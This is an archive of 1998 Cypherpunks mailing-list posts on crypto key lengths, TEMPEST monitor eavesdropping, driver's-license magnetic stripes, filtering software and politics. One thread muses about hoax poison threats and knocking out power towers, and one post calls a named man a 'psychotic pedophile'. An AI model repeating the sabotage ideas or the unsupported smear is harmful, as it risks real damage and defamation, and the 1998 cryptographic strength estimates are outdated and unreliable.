that charge was dismissed on a double-jeopardy ruling.
 
On Jan. 7, U.S. District Judge Edward Lodge moved the case to federal
court. Horiuchi pleaded innocent. His trial is scheduled for March 10.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 
 "America is like a corrupt hard drive.  It's full of virii and huge
  inefficient programs written in Java and Visual Basic.  Whan a hard
  drive gets to the point that it is as screwed up as America is, it's 
  beyond repair.  America needs to be formatted."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Feb 1998 06:51:22 +0800
To: tcmay@got.net
Subject: Re: time to learn chinese?
In-Reply-To: <v03102802b1050abbe851@[207.167.93.63]>
Message-ID: <199802092224.WAA00886@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May <tcmay@got.net> writes:
> Oh, and on the specific prediction...I have my doubts about even the per
> capita numbers rising as fast as some think. It's still a Communist system,
> with periodic crackdowns on anyone or any entity who is perceived to be
> doing "too well."

The interesting aspect of her speculation was on the possibility of an
economic and political process of change which would result in a
transition directly from communism to a free market based political
system, by-passing democracy and socialism.  She viewed democracy and
socialism as mistakes made by the west to be learned from and avoided.

Communist regimes typically include a significant element of central
planning which introduces economic inefficiencies, yes, and loss of
freedom of choice, etc.

Socialist democracies have much in common with communist regimes in
this respect: elements of centralised control, restrictions of choices
(the nanny state, huge welfare systems, 50%+ taxation) large
government restrictions on free market operation.

Both systems suck, but currently the lesser of two evils by a large
margin is living in a socialist democracy because of the wider
freedoms as compared to the lack of freedoms in Communist countries
such as China, and because of it being worth putting up with the nanny
state and 50%+ tax rates as compared to the economic instability and
organised crime problems in Russia, and previous Russian provinces now
split off back in to small countries.

The interesting question is the how these two evolving political and
economic systems will change over time.

Her speculation was that a previously communist system evolving
towards becoming a pure market system might move towards this goal
more rapidly than a rampantly socialist democracy would move towards
the same.  She also considered the different cultural work ethic
signficant: Chinese people on the whole work harder, and re-invest
more of per capita income.

> Anyway, China does not as yet have even a single reasonably state of
> the art chip making plant in its entire country. Given the
> timescales and learning curves involved, it seems unlikely they'll
> be a high tech leader in little over 10 years.

Singapore, Taiwan, and Japan produce sizeable quantities of electronic
devices, consumer electronics items, cars, etc.  In fact I understood
them to out compete western manufacturing in many instances.

They may not always be at the leading edge of R&D, but they do produce
a lot, much of it quality equipment, and we (westerners) buy more
consumer electronics, and cars produced by such countries now.
Personally I would buy a Toyota over a Ford anyday :-)

China might be viewed as larger version of Singapore a few decades ago
perhaps.  Enterprise zones (or same rules for the whole country) with
0% taxation, unrestrictive planning rules etc should help attract
outside investment from high tech companies, if political stability
was viewed as good enough.

Probably you are right on the optimism of the time scales of the
interviewed analyst.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Tue, 10 Feb 1998 11:32:20 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Drivers Licenses
Message-ID: <34DFC8FA.1CECCE12@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous (remailer@htp.org) wrote:

> My question is, how much information can be stored on these strips?

The data that's stored on most of the cards (credit cards, hotel keys,
gym cards, etc.) are encoded with 5 bits per character.  I believe
that this is also known as Baudot encoding.  You can store somewhere
around 80 characters per track on "normal" cards, and most cards
contain a 1/2" magnetic stripe that can hold 4, 1/8" tracks.  So, I
would estimate that your drivers license would hold a total of about
320 characters on all four tracks with standard encoding techniques.

If you are interested in rendering only individual tracks unreadable,
it can be done.  I have done it by scratching off the magnetic
material as you described.  Of course, all tracks run horizontally
across the card, with track 1 being the track closest to the edge
of the card.  So, if you wanted to destroy track 1, you could scrape
off the 1/8" of the strip closest to the long edge of the license.

Have fun.

--David Miller

middle  rival
devil rim lad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 10 Feb 1998 13:23:53 +0800
To: cypherpunks@sirius.infonex.com
Subject: Re: 145 Million
Message-ID: <07496f2732ef978d405246b0043c4035@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Someone wrote:

>>If someone with an 8th grade >>education can make a personal 
>>fortune of $145 million in network >>marketing with herbs, 

And someone else replied:
>that's a shitload of weed!  it would >be quite risky too trying <sic> to 
>move over 45,000 lbs of quality 
>weed.

All I can say is that if you are paying
$145 for 45K pounds, you are getting 
ripped off no matter if it is the
kindest Norhtern Lights you ever
smoked.

That is  $18,777.78+ a pound.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 10 Feb 1998 15:24:49 +0800
To: "WebWarrior3@InfoWar.Com>
Subject: RE: Cyber 'Nannys"
In-Reply-To: <34DF87FE.611AA4EF@InfoWar.Com>
Message-ID: <v03102804b105af4a91ed@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:49 PM -0800 2/9/98, WebWarrior3@InfoWar.Com wrote:

>While I do not disagree that these companies should be able to market
>their products, I wholeheartedly disagree with the fact that often their
>customers (the adults who bought the software or subscribed to he
>'service') are not allowed to have a list of what is actually blocked,

So you wholeheartedly disagree that they are not giving you a list of what
is blocked...so go use another service.

I don't mean to be flippant. At issue here is a very real issue of free
choice and contracts. Customers cannot "demand" a list of criteria for
blocked sites any more than customers can demand a list of the selection
criteria a bookstore uses, or a magazine editor uses, and so on.

I make fun of Cyber Sitter and other Net.Nannies, but there's no role for
"disagreeing with the fact" (whatever that infelicitous expression may
mean) that they usually don't publicize their criteria.

If you can figure out their criteria, great. Brock Meeks and Declan M.
figured out some criteria a while back in an interesting article. But make
sure that your "disagreeing with the fact" is not translated into calling
for disclosure laws. That way lies statism.

--Tim May


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Tu <ATU5713@compuserve.com>
Date: Tue, 10 Feb 1998 12:56:18 +0800
To: Cypher Punks Mailing List <cypherpunks@toad.com>
Subject: Algorithms used in PGP 5.x; Relative strength of Blowfish
Message-ID: <199802092337_MC2-32B1-60F5@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain



What are the algorithms used in PGP 5.x, symetric ones, that is?  For
anything besides 3DES and IDEA, what are their relative strengths to 3DES
or IDEA?  Could someone tell me what their key lengths are?

Also, what's the relative strength of Blowfish to 3DES or IDEA?  Its key
length is variable, as I recall.  Could someone tell me the range?

--Alan
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Tu <ATU5713@compuserve.com>
Date: Tue, 10 Feb 1998 13:03:02 +0800
To: Bill Stewart <cypherpunks@toad.com>
Subject: Re: What's the latest in factoring?
Message-ID: <199802092337_MC2-32B1-60F6@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Bill,

Sorry, but you may see this message twice.

Bill Stewart wrote:

>>>>>
There are two countervailing arguments about very long keys;
one is that if you understand cryptography well enough to 
evaluate the issue, you'll know you don't need to bother,
but the other is that if you don't understand crypto very well,
maybe you should be overly conservative.
<<<<<

Well, personally, I guess by your def I'm in the second group, since I
didn't know I don't need to bother.

>>>>>
Remember that factoring difficulty is roughly exponential;
adding logn bits about doubles the cracking workload 
(depending on which factoring method is being used).  
Factoring a 1024-bit number is _much_ harder than factoring a 512-bit
number, and factoring a 2048-bit number is well into age-of-the-universe 
difficulty level.  The practical level of factoring right now
is about 512 bits, for either a distributed internet effort or
an NSA internal one;
<<<<<

I kind of knew this from a hypothesis, so PGP 5.x is being conservative,
possibly overly so by your definition.  I've seen a screen on a friend's
computer and the default is something like 2048.  By the way, we don't know
about NSA.  They may be able to factor any number, if they have an
algorithm.

>>>>>
in the unlikely event that Moore's law lets
us double processing power 100 times in the next 150 years,
that means a 1500-bit key could be crackable.  So 2048 bits
is certainly more than enough for _your_ lifetime.
Increasing processing power 2**100 times is likely to be tough :-)
After all, features in current microprocessors are on the order
of 100 atoms wide.  And by the time we've developed the level of 
nanotechnology needed to speed up processing that much,
there'll be tiny audio bugs listening to you type your passphrase
into your keyboard and reporting it back to the Central Intelligence
Corporation, or picking up the electromagnetic fields from your
direct neural interface, so the crypto strength won't matter much.
<<<<<

I believe in Moore's law, since in 1992-1993 I read an analysis that
Moore's law was true for the last 100 years.  I think its still true today.
 Your last set of thoughts is chilling, isn't it?

But consider this.  People 10, 20, 30 years ago like us are saying that the
government can eavesdrop on their communication in the future, just as you
are saying now.  Look now.  I am very proud that I am part of the e-crypto
revolution (my coined word).  I am helping to slow down NSA.  I hope that,
by the time the tech you hypothesize about is here, we again will have
technology to slow down NSA.

>>>>>
But do you really _need_ to factor the prime number to crack PGP?  No.
Remember that PGP uses the RSA key to encrypt session keys for IDEA,
or for signing MD5 hashes of documents, rather than using it directly.
So you can decrypt the message by cracking IDEA, or forge a message
by finding MD5 collisions.  Cracking IDEA's 128-bit keys was estimated
to be about as hard as factoring a 3100-bit number, though improvements
to factoring technology may make a 4096-bit number as easy as IDEA.
Also, PGP 2.x passphrases are encrypted with IDEA, so if they've
got your secring.pgp and can crack 4096-bit keys, you're toast,
<<<<<

I know this.  The point is that most if not all people know that RSA is the
weak link, not IDEA.  Would you rather start to work on a 1024-bit RSA key
or IDEA passphrase of an enemy?  Obviously the RSA key.  Barring any
mathematical weakness in IDEA, I am not worried about IDEA.  By the way, my
three-year-old info says that IDEA was being mathematicly attacked in many
quarters, civilian and non-civilian alike.  If they was anything, I would
have heard by now, but I still want to ask.  Has any significant
cryptanalysis attack against IDEA been "successful"?

>>>>>
even if your passphase isn't just your dog's name spelled backwards.
Similarly, by the time processing power doubles 100 times making your
1500-bit key insecure, MD5 will be long toasted.  Either way,
there's no need to go beyond 4096-bit keys ever, with old-style PGP.
Even if you're being overly conservative, that's more than enough.
<<<<<

You seem to be suggesting that MD5 will lead to the downfall of all of our
keys.  Let's think about your toasting of MD5.  The worst thing that can
happen to a one-way hash function is that it can go both ways.  So its dead
for signatures.  So let's suppose now that I can take any document and
produce another document with a higher or lower dollar figure in it and
come up with the same hash.  I can do this easily.  But to somehow exploit
MD5 to crack a passphrase it is impossible because you have nothing to
start working with.  You only have an encrypted key, encrypted with an
128-bit IDEA key.

Look, for our lifetimes, I don't see much point in going beyond 4096 bits
either, maybe even 3072.

>>>>>
Newer versions of PGP dump RSA and IDEA for patent reasons, 
but they also offer alternatives to IDEA and MD5 which may be stronger.
(SHA-1 is stronger than MD5, triple-DES requires immense amounts of
storage to reduce it to a strength similar to IDEA, and just being
extensible means you can replace algorithms that are obsolete.)
<<<<<

Triple-DES is not stronger than IDEA, although it is secure for the most
part.  According to Phil Zimmerman, its effective key length is 112 bits to
128 bits for IDEA.  Its also 3 times slower than DES, which is comparably
slow anyway.  Also, to settle this issue once and for all in my mind, the
Win95 version of PGP, what symetric algorithms do you have to choose from?

Does anyone have any comments on the relative strength of Blowfish?  What
about the mathematics of Blowfish?  Has anyone tried to cryptanalyze it
yet?  Also, I apologize for going on like this, I'll post a separate
question on that.

>>>>>
The other side of practical is how much work it takes to use long keys,
and how many people who want to talk to you use them.
The answer to the latter is "Not many" for RSA keys over 2048.
The former is about N**2 for decryption and N**3 for key generation,
and about linear for encryption with short exponents,
so it'll take you 64 times as long (once) to generate the key,
and 16 times as long to decrypt or sign anything, compared to
the far-more-than-strong-enough 2048-bit key, which is already
4 times as hard to use and 8 times as hard to generate as a 1024.
<<<<<

As I said, I have a 2048-bit key in hibernation.  I haven't posted it to a
key server, but a friend who recently got PGP decided to use my public key
ring, and use my 2048-bit key.  There are only two places in which this key
of mine is accessible.  Anyway, I don't see the 4 time slowdown for using
my secret key.  (I have a 133 MHz).  However, the effect is probably true
for slower processors.  I agree that we shouldn't bother with keys above
4096 bits because its not necessary and it takes too long to communicate
with people who have slower processors.

>>>>>
It's not worth the bother, unless you know have a really, really 
special application that needs to remain secret until long after
you've overthrown the government.  On the other hand,
at least the RSA patent will have expired by then :-)
<<<<<

I already addressed this point.

>>>>>
The Diffie-Hellman implementations in PGP 5.x will let you use
key lengths up to 4096, but the speed behaviour is a bit different.
In particular, key generation is much faster, so generating
overkill-length keys isn't as boring.
<<<<<

First of all, Win95 (not my computer) seems slow to me, even if that
person's processor is faster than mine.  And I hear so much disk reading or
writing, no wonder its slow.  Boring?  Win95 cannot make you bored.  Go do
something else, or play a MIDI file.  You can multi-task.

--Alan
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Tue, 10 Feb 1998 13:11:52 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: SOFT TEMPEST (fwd)
In-Reply-To: <199802092357.RAA25254@einstein.ssz.com>
Message-ID: <19980209235936.37986@die.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Feb 10, 1998 at 03:03:53AM +0100, Lucky Green wrote:
> 
> Now all this was done without the use of a DSP. I can only imagine what
> one could capture after adding a DSP to the setup.

	Miles...
	
	Given static screen images and thousands of repetitions in a few
seconds the processing gain from integration of the signal verus the 
uncorrelated noise over thousands of cycles gets quite interesting. And
add to that the tricks one can do with comb filters and combining
together the correllated energy from several harmonics of the dot clock
one can see that getting signal out from under the trash is easy even at
considerable distances.   It has, in fact, been speculated that the
larger NSA geo and near geosync ELINT/COMINT satellites probably have
the required capability to accomplish this from orbit (with football
field sized antennas this isn't out of the question at all).

	Also the "frequency generator" you talk about needs not be
some extremely expensive HP synthesizer (often of course available for
a few dollars at the local ham radio flea markets in any case), but
simply a good voltage controlled crystal oscillator on the right frequency.
These are $5 parts...
	
-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 10 Feb 1998 07:21:52 +0800
To: cypherpunks@cyberpass.net
Subject: E-CDA
Message-ID: <199802092315.AAA02200@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Congressional Record: February 5, 1998 (House)
 
                   ELECTRONIC CAMPAIGN DISCLOSURE ACT

  (Mr. WHITE asked and was given permission to address the House for 1 
minute.)

  Mr. WHITE. Madam Speaker, in March we are going to vote on campaign 
finance reform in this House. It is a very important issue but also a 
very difficult issue, and it is made particularly difficult because 
most of the bills before us are big bills that deal with the whole 
comprehensive issue that we have to talk about.

  I have got one of those bills, and I hope that we can pass one. But 
just in case we cannot, today I am introducing what we might call a 
small bill that will deal at least with some of the problems. This bill 
is called the Electronic Campaign Disclosure Act, and what it does is 
tell the Federal Elections Commission to get into the 21st century.

  It directs the FEC to establish a database on-line to search over the 
Internet for all the information needed about campaign finances in our 
country. Every campaign would have to file within 10 days a report of 
every contribution that it receives and contributors, and PACs would 
also have to file.

  Madam Speaker, sometimes we cannot do it all in one step. The longest 
journey begins with a single step, and I think if we cannot pass a big 
bill a small bill like the one I am introducing today would be a step 
in the right direction.

                          ____________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 10 Feb 1998 17:01:22 +0800
To: "Brian B. Riley" <cypherpunks@cyberpass.net>
Subject: Re: Driver Licenses
In-Reply-To: <199802092153.QAA07449@mx01.together.net>
Message-ID: <3.0.5.32.19980210004840.00882c40@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:53 PM 2/9/98 -0500, Brian B. Riley wrote:
>  I wonder, though, how long it would go on if some shopkeeper indeed did 
>this? But, is it a crime to try to buy booze or tobacco underage, if you 
>do not try to show fraudulent indentification?

Depends on the state; in many places it's a crime both for the
buyer and the seller.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Feb 1998 14:55:10 +0800
To: cypherpunks@toad.com
Subject: Re: Washington on the verge of being nuked?
In-Reply-To: <3.0.5.32.19980209174919.007b18a0@otc.net>
Message-ID: <8V9Nke9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



David Honig <honig@otc.net> writes:

> At 06:34 PM 2/9/98 EST, Dr.Dimitri Vulis KOTM wrote:
> >One can "disrupt" the water supply by just making a credible assertion that
> >it's been poisoned - but it won't kill nearly as many people as actual
> >poison (or virus/bacteria).
> >
>
> Psychops?

Yes, psyops (no ch) - the most venerable field of information warfare.

> That doesn't work when you have sufficient health-orgs and telecomm
> to get the word out that the water's ok.

By the same reasoning, a bomb threat won't get a building evacuated if
the authorities can check whether the bomb is there...

A psychopath like Guy Polis could just call a TV station and claim that
he put some poison in the water supply which would take a few days to
test for.

> Actually, a lot of people drink bottled water here :-) but
> the 10 million kilos of shit excreted by LA every day would
> build up pretty fast.

NYC is one of the few major cities where the tap water is good enough to
drink and actually tastes good.

> Electric power is probably as vunerable as waterways, despite
> conscious efforts to make the grid redundant.  Of course
> both are controlled by computers, as uncle sam is realizing.
> In LA, all it takes to create a looting riot is to cut electricity
> to the city's alarm systems...

One could use brute force and just blow up enough redundant towers...
Or short them with a kite. :-)

> Major freeway intersections are closed down 2-3 times a year in LA
> due to bomb threats, which are usually just threats -no bombs are found.
> You can snarl the roads very easily at the right time of day, since
> the roads' bandwidth is already exceeded and congestion persists after the
> clog is removed.

NYC has pretty good public transporation... I don't think a terrorist can
do a lot by screwing up the traffic.

I recall that there was a bunch of bomb threates at Salomon Brothers last
year, right after Guy Polis was fired from his contractor job.  Do you
suppose the psychotic pedophile did it?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 11 Feb 1998 02:12:51 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: What's the latest in factoring? (fwd)
In-Reply-To: <199802100105.TAA25850@einstein.ssz.com>
Message-ID: <3.0.5.32.19980210005500.00882c40@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:05 PM 2/9/98 -0600, Jim Choate wrote:
...
>> an NSA internal one; in the unlikely event that Moore's law lets
>> us double processing power 100 times in the next 150 years,
>> that means a 1500-bit key could be crackable.  So 2048 bits
>> is certainly more than enough for _your_ lifetime.
>
>That depends on what current and near-future medical technology can do
>to extend the lifespan of humans. If your assumption is that most folks
>younger than about 50 will be dead in 75 years I suspect that you're in for
>a nasty surprise. 

That is my assumption, and being wrong would be a highly pleasant surprise.

>The reason I posted those cc:'s regarding such research is
>enough that current estimates of key strength based on human life times need
>to be re-evaluated. 

If Moore's law plus algorithm improvements can give us a 2**150 increase
in processing power over the next 200 years, and I'm around to see it,
I'll be very surprised.  (Or I'll be posthumously surprised, if I'm 
not around.)  On the other hand, if that's true,
we'll be in something like the nanotech singularity, where
eavesdropping will make up for any remaining difficulty in key cracking,
as I'd also discussed.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 10 Feb 1998 17:06:45 +0800
To: "D'jinnie" <jinn@inetnebr.com>
Subject: Re: Driver Licenses
In-Reply-To: <3.0.5.32.19980209122020.00889e90@popd.ix.netcom.com>
Message-ID: <3.0.5.32.19980210005639.00882c40@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:49 AM 2/10/98 -0600, you wrote:
>On Mon, 9 Feb 1998, Bill Stewart wrote:
>: 
>: Yup.  It's really annoying to have to give the California DMV lots of
>: personal information about myself so they can track down deadbeat dads,
>: given that I'm not even a dad, much less a deadbeat dad, and so they
>: can track down Mexicans who want to drive without citizenship papers,
>: and similar presumptions of potential guilt.
>
>You're not required to be a citizen. You're not even required to be a
>permanent resident. All you need is to be here legally for any length of
>time. Some places won't check. Some require SSN cards, which can only be
>issued to ppl who are here legally, regardless of work authorization
>(since we all know SSN go way beyond original purpose ;)

CA has occasionally demanded citizenship papers to get a driver's license,
because a few politicians want to harass the large numbers of Mexicans who 
live here without papers.  They weren't demanding them when I got my
license 4 years ago, because they'd just been hassled in court,
and this time when I renewed the clerk said the main reason the state
mails licenses centrally instead of just printing them at the DMV
is so they can check all the data with the INS.

If you're driving a car here with Sonora plates and you've got a
Mexican license with a Sonora address, the CA cops can't bust you
for it, though they can ask stuff like what you're doing here.
But if you're parking the car on the street for more than 2 months
(it may be 1 month?) with Sonora plates, they can bust you for
not having California plates, even though you can't get them,
and for not having a California license, even though you can't get one.
Just as they can for still having Jersey plates on your car.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Tue, 10 Feb 1998 12:18:05 +0800
To: cypherpunks@sirius.infonex.com
Subject: Re: attracting funding for tempest? (Re: SOFT TEMPEST)
In-Reply-To: <199802092134.VAA00795@server.eternity.org>
Message-ID: <E0y244o-0002Ov-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back wrote on 1998-02-09 21:34 UTC:
> There should be a reasonably large supply of
> commercial funding candidates even given the 90 : 10 ratio of business
> interest in availability over confidentiality.

Availability is usually based on authenticity, and authenticity is based
on the confidentiality of keying variables, therefore at some level,
everyone interested in computer security should be interested in
research about the hardware aspects of confidentiality.

> > Copyright protections seems to be an interesting application.
> 
> Personally I view technology to assist copyright piracy a more
> interesting research goal!

Come on, copyright piracy is technically trivial today! Little software
is sold with any copyright protection technology, and if, then it is
usually easily broken as the full cleartext machine code is always
available for reverse engineering.

> I am not sure I want to see my computer narcing out over RF
> frequencies what software is installed -- once enabled for corporates
> there is the risk it will be used against individuals.

This concerns only individuals who feel important enough to fear that
any organization might want to spend hundreds of dollars per day
to park a grey van full of state-of-the-art DSP and HF equipment
in front of your home exclusively to observe what you do on your
home machine. Quite unrealistic. Of course, in the future,
when cellular base stations become freely programmable DSP software
radios that can via the network be turned from GSM-BTSs into
Tempest monitoring stations by a minor software update, then the
paranoid's deep desire to be observed could actually be fulfilled
by evil organizations on a very large scale. Stay tuned ...

> This sounds
> about as (un)desirable as CPUs capable of running encrypted
> instruction streams, with per CPU keys loaded at manufacture enabling
> software to be purchased for your CPU only (and hence disempowering 
> users who will thus be unable to even disassemble such code prior to
> running), or smart cards as modernized next generation dongles.

Well, I have been thinking about this one, too, and I am quite sure that
we will see such mechanisms showing up in common desktop processors
within the next few years. Then, copyright piracy will become an
interesting technological challenge and research on attacks will
become orders of magnitude more fascinating than now. See

  http://www.cl.cam.ac.uk/~mgk25/trustno1.pdf

for details. I am not sure, whether high-security copy protection
is a really bad idea: It could also mean that strict technical
copyright enforcement like it is possible with cryptoprocessors
will change the market situation favourably: Small startup companies
suddenly become able to sell mass market software at prices in
the range of <10 dollars per copy with only a cheap web server as their
distribution infrastructure. When the success of software marketing
is not any more dependent on the distribution infrastructure that
big players like Microsoft enjoy today (retailers, bundling contracts,
etc.), market success would much more depend on the quality of
product and service than on the control over a distribution
system infrastructure. If the copy protection offered by
cryptoprocessors would allow small companies to compete successfully
with high quality ultra-low price software against Microsoft, then
the old shareware distribution concept might actually start to work.
In addition, the same transistors used for bus encryption can
also be used to keep your entire harddisk encrypted without performance
loss and the encrypted software distribution protects you better
against Trojans, so you'll get increased overall security as a free
side effect.

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D'jinnie" <jinn@inetnebr.com>
Date: Tue, 10 Feb 1998 15:39:41 +0800
To: Cypherpunks <cypherpunks@cyberpass.net>
Subject: Re: Driver Licenses
In-Reply-To: <199802100200.VAA03490@deathstar.jabberwock.org>
Message-ID: <Pine.GSO.3.95.980210013136.10542D-100000@falcon>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Feb 1998, Mark Rogaski wrote:

: Here in the Peoples Republik ov NJ, the DL's have no magstrips.  But, 
: being that it is NJ, they're probably not far away.  An interesting point
: is that, when I moved (intrastate), the MVS sent a decal with the new
: address to stick on the back.  No re-issue necessary, which is good, since
: most bars/liquor stores will not accept licenses marked DUP.  But, they
: will accept passports.

I believe the sticker thing is standard practice...
: 
: Also interesting is that PA has recently (within the past 2-4 years) been
: issuing DL's with the driver's SSN.

That is standard practice in Missouri which I think is kinda silly but it
got me out of bringing my SSN card to my employers (which by then took
several spins through the washer :)
You have to request for the number to be different and CDL only allows it
on grounds of religious convictions.
I think I'll just form a sect...
Why are religions, no matter how kooky, respected so much??

---
Reality leaves a lot to the imagination.

jinn@inetnebr.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Tue, 10 Feb 1998 09:52:39 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: TEMPEST
In-Reply-To: <199802092316.RAA24851@einstein.ssz.com>
Message-ID: <E0y24lM-0001NQ-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote on 1998-02-09 23:16 UTC:
> The screen grid is where the dot clock goes to modulate the e-beam, or is
> your claim we're going to modulate the filament directly?

Ok, now I understand what you where talking about. Sorry, this was just a very
silly language misunderstanding (my knowledge of CRTs is based on
German vocabulary, so I mixed up "screen grid" and "mask" and was surprised
to read that you seemed to claim that the per-pixel on-off modulation
that van Eck described for his old-style terminals in fig 8c of his
C&S paper is still there in the form of current interruptions caused
by mask holes ... I hope you can understand my surprise ... ;-).
Forget everything I wrote about "screen grid modulation" in my last
reply, I fully agreed with you here.

> If your getting your signal off the harmonics you're doing it the hard way.
> Go back and re-read your texts on Fourier Transforms and then do a
> power-spectrum analysis on the signals to the tube; what you will find is
> that the primary frequencies get the majority of the signal (eg 1st harmonic
> of a square wave (ie a dot clock) only gets, at best, 1/3 of the energy of
> the primary).

But this is not necessarily, where the the monitor resonates nicely.
Van Eck has reported very similar results in his paper: His VDU
had a dot clock of 11 MHz and he got nice resonance peaks near 125
and 210 MHz.

> A very effective method to confuse Van Eck is to have several monitors
> sitting next to each other with different displays. A more active display
> is much more effective than one that is static (eg. such as a person typing
> in an email to cypherpunks).

If you have only a van Eck style receiver, yes. But as soon as you record
the reception over some time and observe the images phases to drift only
slightly against each other, you might be able to separate them using
similar processing techniques as used in computer tomography.

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D'jinnie" <jinn@inetnebr.com>
Date: Tue, 10 Feb 1998 15:53:21 +0800
To: Cypherpunks Mailing List <cypherpunks@cyberpass.net>
Subject: Re: Driver Licenses
In-Reply-To: <3.0.5.32.19980209122020.00889e90@popd.ix.netcom.com>
Message-ID: <Pine.GSO.3.95.980210014545.10542G-100000@falcon>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Feb 1998, Bill Stewart wrote:
: 
: Yup.  It's really annoying to have to give the California DMV lots of
: personal information about myself so they can track down deadbeat dads,
: given that I'm not even a dad, much less a deadbeat dad, and so they
: can track down Mexicans who want to drive without citizenship papers,
: and similar presumptions of potential guilt.

You're not required to be a citizen. You're not even required to be a
permanent resident. All you need is to be here legally for any length of
time. Some places won't check. Some require SSN cards, which can only be
issued to ppl who are here legally, regardless of work authorization
(since we all know SSN go way beyond original purpose ;)

---
Reality leaves a lot to the imagination.

jinn@inetnebr.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Janyce.com, Inc. Union Gap WA  USA" <chief.gopher@janyce.com>
Date: Tue, 10 Feb 1998 18:18:28 +0800
To: Cypherpunks@toad.com
Subject: KCKSG Helpers List
In-Reply-To: <34AD7EAE.693B@toad.com>
Message-ID: <3.0.5.32.19980210021014.007f2c80@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:56 PM 1/2/98 -0800, you wrote:
>I noticed that on the helpers section my ph # is listed.. I must have
>accidentally entered that. I would prefer that its not there..
>
>Could you please remove it?
>-Jim
>
>

I have no idea who a Jim whose address cypherpunks@toad.com is.

If you are a member, give me your membership no. and full name.
As requested please address member concerns to CUSTOMER.SERVICE@janyce.com

If you are not a member, how did you find the helpers list?


-= Janyce =-         Kissing Cousins Korner       
            http://www.janyce.com/genecous/book.html
      JOIN TODAY: http://www.janyce.com/misc/ccformC.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Tue, 10 Feb 1998 09:09:46 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Driver Licenses
